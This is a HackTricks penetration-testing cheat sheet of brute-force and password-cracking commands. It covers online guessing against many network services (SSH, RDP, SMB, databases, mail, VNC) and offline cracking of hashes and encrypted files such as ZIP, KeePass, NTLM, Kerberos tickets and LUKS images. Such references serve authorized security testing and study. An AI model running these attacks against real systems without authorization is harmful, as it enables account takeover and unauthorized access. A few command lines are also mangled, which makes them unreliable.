HackTricks
Search…
🤩
Generic Methodologies & Resources
🐧
Linux Hardening
🍏
MacOS Hardening
🪟
Windows Hardening
📱
Mobile Pentesting
👽
Network Services Pentesting
🕸
Pentesting Web
⛈
Cloud Security
😎
Hardware/Physical Access
🦅
Reversing & Exploiting
🔮
Crypto & Stego
🧐
External Platforms Reviews/Writeups
✍
TODO
Brute Force - CheatSheet
Support HackTricks and get benefits!
Default Credentials
Search in google for default credentials of the technology that is being used, or try this links:
Create your own Dictionaries
Find as much information about the target as you can and generate a custom dictionary. Tools that may help:
Crunch
1
crunch 4 6 0123456789ABCDEF -o crunch1.txt #From length 4 to 6 using that alphabet
2
crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha # Only length 4 using charset mixalpha (inside file charset.lst)
3
4
@ Lower case alpha characters
5
, Upper case alpha characters
6
% Numeric characters
7
^ Special characters including spac
8
crunch 6 8 -t ,@@^^%%
Copied!
Cewl
1
cewl example.com -m 5 -w words.txt
Copied!
Generate passwords based on your knowledge of the victim (names, dates...)
1
python3 cupp.py -h
Copied!
Wordlists
Services
Ordered alphabetically by service name.
AFP
1
nmap -p 548 --script afp-brute <IP>
2
msf> use auxiliary/scanner/afp/afp_login
3
msf> set BLANK_PASSWORDS true
4
msf> set USER_AS_PASS true
5
msf> set PASS_FILE <PATH_PASSWDS>
6
msf> set USER_FILE <PATH_USERS>
7
msf> run
Copied!
AJP
1
nmap --script ajp-brute -p 8009 <IP>
Copied!
Cassandra
1
nmap --script cassandra-brute -p 9160 <IP>
Copied!
CouchDB
1
msf> use auxiliary/scanner/couchdb/couchdb_login
2
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 5984 http-get /
Copied!
Docker Registry
1
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst 10.10.10.10 -s 5000 https-get /v2/
Copied!
Elasticsearch
1
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 9200 http-get /
Copied!
FTP
1
hydra -l root -P passwords.txt [-t 32] <IP> ftp
2
ncrack -p 21 --user root -P passwords.txt <IP> [-T 5]
3
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ftp
Copied!
HTTP Generic Brute
HTTP Basic Auth
1
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst sizzle.htb.local http-get /certsrv/
2
# Use https-get mode for httpS
3
medusa -h <IP> -u <username> -P <passwords.txt> -M http -m DIR:/path/to/auth -T 10
Copied!
HTTP - Post Form
1
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V
2
# Use https-post-form mode for httpS
Copied!
For https you have to change from "http-post-form" to "https-post-form"
HTTP - CMS -- (W)ordpress, (J)oomla or (D)rupal or (M)oodle
1
cmsmap -f W/J/D/M -u a -p a https://wordpress.com
Copied!
IMAP
1
hydra -l USERNAME -P /path/to/passwords.txt -f <IP> imap -V
2
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f <IP> imap -V
3
nmap -sV --script imap-brute -p <PORT> <IP>
Copied!
IRC
1
nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=/path/users.txt,passdb=/path/pass.txt -p <PORT> <IP>
Copied!
ISCSI
1
nmap -sV --script iscsi-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 3260 <IP>
Copied!
JWT
1
#hashcat
2
hashcat -m 16500 -a 0 jwt.txt .\wordlists\rockyou.txt
3
4
#https://github.com/Sjord/jwtcrack
5
python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt
6
7
#John
8
john jwt.txt --wordlist=wordlists.txt --format=HMAC-SHA256
9
10
#https://github.com/ticarpi/jwt_tool
11
python3 jwt_tool.py -d wordlists.txt <JWT token>
12
13
#https://github.com/brendan-rius/c-jwt-cracker
14
./jwtcrack eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc 1234567890 8
15
16
#https://github.com/mazen160/jwt-pwn
17
python3 jwt-cracker.py -jwt eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc -w wordlist.txt
18
19
#https://github.com/lmammino/jwt-cracker
20
jwt-cracker "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ" "abcdefghijklmnopqrstuwxyz" 6
Copied!
LDAP
1
nmap --script ldap-brute -p 389 <IP>
Copied!
MQTT
1
ncrack mqtt://127.0.0.1 --user test –P /root/Desktop/pass.txt -v
Copied!
Mongo
1
nmap -sV --script mongodb-brute -n -p 27017 <IP>
2
use auxiliary/scanner/mongodb/mongodb_login
Copied!
MySQL
1
# hydra
2
hydra -L usernames.txt -P pass.txt <IP> mysql
3
4
# msfconsole
5
msf> use auxiliary/scanner/mysql/mysql_login; set VERBOSE false
6
7
# medusa
8
medusa -h <IP/Host> -u <username> -P <password_list> <-f | to stop medusa on first success attempt> -t <threads> -M mysql
Copied!
OracleSQL
1
patator oracle_login sid=<SID> host=<IP> user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017
2
3
./odat.py passwordguesser -s $SERVER -d $SID
4
./odat.py passwordguesser -s $MYSERVER -p $PORT --accounts-file accounts_multiple.txt
5
6
#msf1
7
msf> use admin/oracle/oracle_login
8
msf> set RHOSTS <IP>
9
msf> set RPORT 1521
10
msf> set SID <SID>
11
12
#msf2, this option uses nmap and it fails sometimes for some reason
13
msf> use scanner/oracle/oracle_login
14
msf> set RHOSTS <IP>
15
msf> set RPORTS 1521
16
msf> set SID <SID>
17
18
#nmap fails sometimes for some reson executing this script
19
nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=<SID> <IP>
Copied!
In order to use oracle_login with patator you need to install:
1
pip3 install cx_Oracle --upgrade
Copied!
1
nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30
Copied!
POP
1
hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -V
2
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 995 -f <IP> pop3 -V
Copied!
PostgreSQL
1
hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP> postgres
2
medusa -h <IP> –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M postgres
3
ncrack –v –U /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP>:5432
4
patator pgsql_login host=<IP> user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt
5
use auxiliary/scanner/postgres/postgres_login
6
nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>
Copied!
PPTP
You can download the
.deb package to install from https://http.kali.org/pool/main/t/thc-pptp-bruter/1
sudo dpkg -i thc-pptp-bruter*.deb #Install the package
2
cat rockyou.txt | thc-pptp-bruter –u <Username> <IP>
Copied!
RDP
1
ncrack -vv --user <User> -P pwds.txt rdp://<IP>
2
hydra -V -f -L <userslist> -P <passwlist> rdp://<IP>
Copied!
Redis
1
msf> use auxiliary/scanner/redis/redis_login
2
nmap --script redis-brute -p 6379 <IP>
3
hydra –P /path/pass.txt redis://<IP>:<PORT> # 6379 is the default
Copied!
Rexec
1
hydra -l <username> -P <password_file> rexec://<Victim-IP> -v -V
Copied!
Rlogin
1
hydra -l <username> -P <password_file> rlogin://<Victim-IP> -v -V
Copied!
Rsh
1
hydra -L <Username_list> rsh://<Victim_IP> -v -V
Copied!
Rsync
1
nmap -sV --script rsync-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 873 <IP>
Copied!
RTSP
1
hydra -l root -P passwords.txt <IP> rtsp
Copied!
SNMP
1
msf> use auxiliary/scanner/snmp/snmp_login
2
nmap -sU --script snmp-brute <target> [--script-args snmp-brute.communitiesdb=<wordlist> ]
3
onesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt <IP>
4
hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt target.com snmp
Copied!
SMB
1
nmap --script smb-brute -p 445 <IP>
2
hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1
Copied!
SMTP
1
hydra -l <username> -P /path/to/passwords.txt <IP> smtp -V
2
hydra -l <username> -P /path/to/passwords.txt -s 587 <IP> -S -v -V #Port 587 for SMTP with SSL
Copied!
SOCKS
1
nmap -vvv -sCV --script socks-brute --script-args userdb=users.txt,passdb=/usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt,unpwndb.timelimit=30m -p 1080 <IP>
Copied!
SQL Server
1
#Use the NetBIOS name of the machine as domain
2
crackmapexec mssql <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
3
hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP> mssql
4
medusa -h <IP> –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M mssql
5
nmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=customuser.txt,passdb=custompass.txt,ms-sql-brute.brute-windows-accounts <host> #Use domain if needed. Be carefull with the number of password in the list, this could block accounts
6
msf> use auxiliary/scanner/mssql/mssql_login #Be carefull, you can block accounts. If you have a domain set it and use USE_WINDOWS_ATHENT
Copied!
SSH
1
hydra -l root -P passwords.txt [-t 32] <IP> ssh
2
ncrack -p 22 --user root -P passwords.txt <IP> [-T 5]
3
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ssh
4
patator ssh_login host=<ip> port=22 user=root 0=/path/passwords.txt password=FILE0 -x ignore:mesg='Authentication failed'
Copied!
Telnet
1
hydra -l root -P passwords.txt [-t 32] <IP> telnet
2
ncrack -p 23 --user root -P passwords.txt <IP> [-T 5]
3
medusa -u root -P 500-worst-passwords.txt -h <IP> -M telnet
Copied!
VNC
1
hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt -s <PORT> <IP> vnc
2
medusa -h <IP> –u root -P /root/Desktop/pass.txt –M vnc
3
ncrack -V --user root -P /root/Desktop/pass.txt <IP>:>POR>T
4
patator vnc_login host=<IP> password=FILE0 0=/root/Desktop/pass.txt –t 1 –x retry:fgep!='Authentication failure' --max-retries 0 –x quit:code=0use auxiliary/scanner/vnc/vnc_login
5
nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>
6
7
#Metasploit
8
use auxiliary/scanner/vnc/vnc_login
9
set RHOSTS <ip>
10
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/passwords.lst
Copied!
Winrm
1
crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
Copied!
Local
Online cracking databases
Check this out before trying to bruteforce a Hash.
ZIP
1
#sudo apt-get install fcrackzip
2
fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' chall.zip
Copied!
1
zip2john file.zip > zip.john
2
john zip.john
Copied!
1
#$zip2$*0*3*0*a56cb83812be3981ce2a83c581e4bc4f*4d7b*24*9af41ff662c29dfff13229eefad9a9043df07f2550b9ad7dfc7601f1a9e789b5ca402468*694b6ebb6067308bedcd*$/zip2$
2
hashcat.exe -m 13600 -a 0 .\hashzip.txt .\wordlists\rockyou.txt
3
.\hashcat.exe -m 13600 -i -a 0 .\hashzip.txt #Incremental attack
Copied!
7z
1
cat /usr/share/wordlists/rockyou.txt | 7za t backup.7z
Copied!
1
#Download and install requirements for 7z2john
2
wget https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/7z2john.pl
3
apt-get install libcompress-raw-lzma-perl
4
./7z2john.pl file.7z > 7zhash.john
Copied!
PDF
1
apt-get install pdfcrack
2
pdfcrack encrypted.pdf -w /usr/share/wordlists/rockyou.txt
3
#pdf2john didnt worked well, john didnt know which hash type was
4
# To permanently decrypt the pdf
5
sudo apt-get install qpdf
6
qpdf --password=<PASSWORD> --decrypt encrypted.pdf plaintext.pdf
Copied!
JWT
1
git clone https://github.com/Sjord/jwtcrack.git
2
cd jwtcrack
3
4
#Bruteforce using crackjwt.py
5
python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt
6
7
#Bruteforce using john
8
python jwt2john.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc > jwt.john
9
john jwt.john #It does not work with Kali-John
Copied!
NTLM cracking
1
Format:USUARIO:ID:HASH_LM:HASH_NT:::
2
john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT file_NTLM.hashes
3
hashcat -a 0 -m 1000 --username file_NTLM.hashes /usr/share/wordlists/rockyou.txt --potfile-path salida_NT.pot
Copied!
Keepass
1
sudo apt-get install -y kpcli #Install keepass tools like keepass2john
2
keepass2john file.kdbx > hash #The keepass is only using password
3
keepass2john -k <file-password> file.kdbx > hash # The keepas is also using a file as a needed credential
4
#The keepass can use password and/or a file as credentials, if it is using both you need to provide them to keepass2john
5
john --wordlist=/usr/share/wordlists/rockyou.txt hash
Copied!
Keberoasting
1
john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast
2
hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt
3
./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi
Copied!
Lucks image
Method 1
1
bruteforce-luks -f ./list.txt ./backup.img
2
cryptsetup luksOpen backup.img mylucksopen
3
ls /dev/mapper/ #You should find here the image mylucksopen
4
mount /dev/mapper/mylucksopen /mnt
Copied!
Method 2
1
cryptsetup luksDump backup.img #Check that the payload offset is set to 4096
2
dd if=backup.img of=luckshash bs=512 count=4097 #Payload offset +1
3
hashcat -m 14600 -a 0 luckshash wordlists/rockyou.txt
4
cryptsetup luksOpen backup.img mylucksopen
5
ls /dev/mapper/ #You should find here the image mylucksopen
6
mount /dev/mapper/mylucksopen /mnt
Copied!
Another Luks BF tutorial: http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1
Mysql
1
#John hash format
2
<USERNAME>:$mysqlna$<CHALLENGE>*<RESPONSE>
3
dbuser:$mysqlna$112233445566778899aabbccddeeff1122334455*73def07da6fba5dcc1b19c918dbd998e0d1f3f9d
Copied!
PGP/GPG Private key
1
gpg2john private_pgp.key #This will generate the hash, save it in a file
2
john --wordlist=/usr/share/wordlists/rockyou.txt ./hash
Copied!
DPAPI Master Key
Open Office Pwd Protected Column
If you have xlsx file with a column protected by password you can unprotect it:
- Upload it to google drive and the password will be automatically removed
- To remove it manually:
1
unzip file.xlsx
2
grep -R "sheetProtection" ./*
3
# Find something like: <sheetProtection algorithmName="SHA-512"
4
hashValue="hFq32ZstMEekuneGzHEfxeBZh3hnmO9nvv8qVHV8Ux+t+39/22E3pfr8aSuXISfrRV9UVfNEzidgv+Uvf8C5Tg" saltValue="U9oZfaVCkz5jWdhs9AA8nA" spinCount="100000" sheet="1" objects="1" scenarios="1"/>
5
# Remove that line and rezip the file
6
zip -r file.xls .
Copied!
PFX Certificates
1
# From https://github.com/Ridter/p12tool
2
./p12tool crack -c staff.pfx -f /usr/share/wordlists/rockyou.txt
3
# From https://github.com/crackpkcs12/crackpkcs12
4
crackpkcs12 -d /usr/share/wordlists/rockyou.txt ./cert.pfx
Copied!
Tools
Hash-identifier
1
hash-identifier
2
> <HASH>
Copied!
John mutation
Read /etc/john/john.conf and configure it
1
john --wordlist=words.txt --rules --stdout > w_mutated.txt
2
john --wordlist=words.txt --rules=all --stdout > w_mutated.txt #Apply all rules
Copied!
Hashcat
1
hashcat --example-hashes | grep -B1 -A2 "NTLM"
Copied!
Cracking Linux Hashes - /etc/shadow file
1
500 | md5crypt $1$, MD5(Unix) | Operating-Systems
2
3200 | bcrypt $2*$, Blowfish(Unix) | Operating-Systems
3
7400 | sha256crypt $5$, SHA256(Unix) | Operating-Systems
4
1800 | sha512crypt $6$, SHA512(Unix) | Operating-Systems
Copied!
Cracking Windows Hashes
1
3000 | LM | Operating-Systems
2
1000 | NTLM | Operating-Systems
Copied!
Cracking Common Application Hashes
1
900 | MD4 | Raw Hash
2
0 | MD5 | Raw Hash
3
5100 | Half MD5 | Raw Hash
4
100 | SHA1 | Raw Hash
5
10800 | SHA-384 | Raw Hash
6
1400 | SHA-256 | Raw Hash
7
1700 | SHA-512 | Raw Hash
Copied!
Support HackTricks and get benefits!
Copy link
Contents
Default Credentials
Create your own Dictionaries
Crunch
Cewl
CUPP
pydictor
Wordlists
Services
AFP
AJP
Cassandra
CouchDB
Docker Registry
Elasticsearch
FTP
HTTP Generic Brute
HTTP Basic Auth
HTTP - Post Form
HTTP - CMS -- (W)ordpress, (J)oomla or (D)rupal or (M)oodle
IMAP
IRC
ISCSI
JWT
LDAP
MQTT
Mongo
MySQL
OracleSQL
POP
PostgreSQL
PPTP
RDP
Redis
Rexec
Rlogin
Rsh
Rsync
RTSP
SNMP
SMB
SMTP
SOCKS
SQL Server
SSH
Telnet
VNC
Winrm
Local
Online cracking databases
ZIP
7z
PDF
JWT
NTLM cracking
Keepass
Keberoasting
Lucks image
Mysql
PGP/GPG Private key
DPAPI Master Key
Open Office Pwd Protected Column
PFX Certificates
Tools
Hash-identifier
John mutation
Hashcat